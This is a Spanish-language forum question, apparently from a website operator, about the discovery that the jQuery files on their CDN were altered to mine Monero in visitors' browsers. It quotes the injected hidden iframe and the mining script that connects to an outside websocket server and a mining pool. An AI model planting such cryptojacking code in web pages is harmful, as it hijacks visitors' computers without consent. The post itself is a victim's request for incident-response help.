Me di cuenta de que recientemente nuestro sitio web ha tenido un rendimiento deficiente y, a menudo, utiliza el 100% del uso de la CPU en las máquinas de los usuarios. Después de analizar esto, he notado que todos los archivos jquery en nuestro CDN se editaron hace 6 días y ahora están minando el lado del cliente de Monero cuando la gente visita nuestro sitio web.
El siguiente iframe se está cargando en nuestra página:
<iframe src="https://www.jqr-cdn.download/lot.html"style="width: 0px; height: 1px;">
<html>
<head></head>
<body>
<script src="jquery-3.3.1.js"></script>
<script>
server = "wss://www.jqr-cdn.download:8190";
startMining("minexmr.com","winner winner chicken dinner");
</script>
</body>
</html>
Yo pienso esto se debe a que nuestro S3 se puede escribir públicamente (tendré que analizarlo)
Mis preguntas son:
¿Esto solo ha sido una sanguijuela de la CPU, o algo más malo sucedió a través de este método de ataque (recolección de datos, etc.)
¿El hecho de cerrar nuestro S3 y sobrescribir los archivos con copias genuinas resolverá el problema, si es así lo resolveremos de forma permanente?
¿Cuál es el significado del parámetro "cena de pollo ganadora ganadora", es este un nombre de usuario, solo una burla o algo más?